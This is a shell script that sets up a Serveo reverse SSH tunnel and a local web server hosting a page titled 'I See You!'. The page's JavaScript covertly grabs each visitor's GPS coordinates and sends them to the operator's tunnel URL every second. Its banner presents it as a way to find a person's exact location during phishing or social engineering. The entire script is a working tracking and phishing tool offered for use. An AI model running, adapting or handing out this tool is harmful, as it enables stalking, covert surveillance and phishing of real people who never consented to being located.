#!/bin/sh

# Clear the screen and show initial message
clear
echo "Copy the Serveo link (you have 20 seconds)..."
echo "-------------------------------------------"

# Start SSH tunnel in the background and log output
ssh -R 80:localhost:8080 serveo.net | tee ~/gps.log &
SSH_PID=$!

# Wait 20 seconds
sleep 20
clear

cat << "EOF"
██╗    ███████╗███████╗███████╗    ██╗   ██╗ ██████╗ ██╗   ██╗
██║    ██╔════╝██╔════╝██╔════╝    ╚██╗ ██╔╝██╔═══██╗██║   ██║
██║    ███████╗█████╗  █████╗       ╚████╔╝ ██║   ██║██║   ██║
██║    ╚════██║██╔══╝  ██╔══╝        ╚██╔╝  ██║   ██║██║   ██║
██║    ███████║███████╗███████╗       ██║   ╚██████╔╝╚██████╔╝
╚═╝    ╚══════╝╚══════╝╚══════╝       ╚═╝    ╚═════╝  ╚═════╝

[+] Author: Viral Maniar  
[+] Modded by: Techguy origin (on TikTok)  
[+] Description: This tool uses Serveo to find the exact location of the user during social engineering or phishing engagements.
EOF

echo
printf 'Enter the URL generated by Serveo (e.g., https://example.serveo.net): '
read varurl

# POSIX-compatible URL check
if [ -z "$varurl" ]; then
    echo "Error: No URL provided. Exiting."
    kill "$SSH_PID" 2>/dev/null
    exit 1
fi

# Create webpage
mkdir -p ~/webpage
cat <<EOF > ~/webpage/index.html
<!DOCTYPE html>
<html>
<head>
    <title>I See You!</title>
    <style>
        body {
            background-image: url("https://user-images.githubusercontent.com/3501170/55271108-d11b3180-52fb-11e9-97e2-c930be295147.png");
            background-size: cover;
            background-repeat: no-repeat;
            height: 100vh;
            margin: 0;
            font-family: Arial, sans-serif;
        }
    </style>
</head>
<body>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script>
        function httpGet(theUrl) {
            fetch(theUrl, { mode: 'no-cors' }).catch(err => console.log("Error sending location:", err));
        }

        function autoUpdate() {
            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(
                    function(position) {
                        var coords = position.coords.latitude + ',' + position.coords.longitude;
                        var url = "$varurl/logme/" + coords;
                        httpGet(url);
                        setTimeout(autoUpdate, 1000);
                    },
                    function(err) {
                        console.log("Geolocation error:", err);
                    }
                );
            } else {
                alert("Geolocation is not supported by this browser.");
            }
        }

        \$(document).ready(autoUpdate);
    </script>
</body>
</html>
EOF

cd ~/webpage || exit 1

# Fallback-friendly server startup
if command -v python3 >/dev/null 2>&1; then
    python3 -m http.server 8080 >/dev/null 2>&1 &
    SERVER_PID=$!
    echo "[✓] Server started using Python at http://localhost:8080"
elif command -v busybox >/dev/null 2>&1; then
    busybox httpd -f -p 8080 &
    SERVER_PID=$!
    echo "[✓] Server started using BusyBox at http://localhost:8080"
elif command -v ncat >/dev/null 2>&1; then
    while true; do
        { echo -ne "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"; cat index.html; } | ncat -l 8080
    done &
    SERVER_PID=$!
    echo "[✓] Server started using ncat at http://localhost:8080"
else
    echo "[✗] No supported web server (need python3, busybox, or ncat)."
    kill "$SSH_PID" 2>/dev/null
    exit 1
fi

# Cleanup
trap 'echo "\n[+] Cleaned up background processes."; kill "$SSH_PID" "$SERVER_PID" 2>/dev/null' EXIT

echo "-------------------------------------------"
echo "[✓] Tunnel active via Serveo: $varurl"
echo "[✓] Web server running on http://localhost:8080"
echo "[*] Press Ctrl+C to stop..."
wait
